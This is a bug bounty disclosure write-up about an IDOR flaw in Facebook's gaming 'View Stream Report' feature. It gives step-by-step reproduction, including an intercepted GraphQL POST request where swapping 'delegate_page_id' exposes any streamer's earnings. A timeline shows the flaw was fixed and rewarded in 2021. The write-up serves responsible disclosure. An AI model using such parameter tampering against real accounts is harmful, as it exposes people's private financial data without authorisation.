Introduction
Within the Facebook gaming dashboard, streamers have access to a valuable feature known as the “Viewing Stream Report.” This option provides essential information about their stream, including details such as the title, description, and tagged game. Streamers can leverage this tool to gain insights into the performance and key attributes of their streams. For additional details, refer to the official guide at https://www.facebook.com/business/help/423354648152123?id=648321075955172.
The finding
The Post request responsible for managing this option is susceptible to an Insecure Direct Object Reference (IDOR) bug within the “delegate_page_id” parameter. This vulnerability opens the door for potential exploitation, enabling unauthorized access to the financial information associated with any recent live stream on a gaming streamer’s page.
This flaw grants the attacker the capability to unveil the earnings associated with the latest stream video asset for any gaming streamer page. The severity of this vulnerability lies in the unauthorized disclosure of sensitive financial data, posing a significant risk to the affected gaming streamers’ privacy and financial security.
Reproduction Steps
Attacker’s Perspective:
- Navigate to https://business.facebook.com/creatorstudio/home ==> Creative tools ===> Live dashboard.
- Access the “Latest stream” box option and Intercept the request using Burp Suite. Click on “View Stream Report.”
Upon intercepting the POST request, observe the following details:
POST /api/graphql/ HTTP/1.1
Host: business.facebook.com
av=attacker_page_id&__user=attacker_user_id&__a=1&__dyn=xxx&__csr=&__req=1l&__beoa=0&__pc=PHASED%3Amedia_manager_pkg&dpr=1&__ccg=EXCELLENT&__rev=1003338073&__s=1go6yt%3A1dmt22%3Amrohob&__hsi=6931897176295571644-0&__comet_req=0&fb_dtsg=xxxxxx&jazoest=22015&__jssesw=1&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=GamesVideoStreamerDashboardProfilePlusVideoQuery&variables={"delegate_page_id":"attacker_page_ID"}&server_timestamps=true&doc_id=5005787666128910
Identify the vulnerable parameter as “delegate_page_id.” Change its value to any streamer page and forward the request to the server.
This manipulation yields extensive information about the streamer page, including sensitive details:
"latest_stream_video_asset_earnings":"500.00"
This information, specifically the earnings, is considered private and should only be accessible to page administrators. Unauthorized access to such financial details poses a serious breach of privacy and requires immediate attention and remediation to uphold the integrity of the platform.
Timeline
Sarmad | 22 Feb 2021
- Initial Report
Meta Bug Bounty | 24 Feb 2021
- Report Triaged
Meta Bug Bounty | 16 Mar 2021
- Report Fixed
Sarmad | 16 Mar 2021
- Fix Confirmed
Meta Bug Bounty | 19 Mar 2021
- Bounty Awarded + Bonus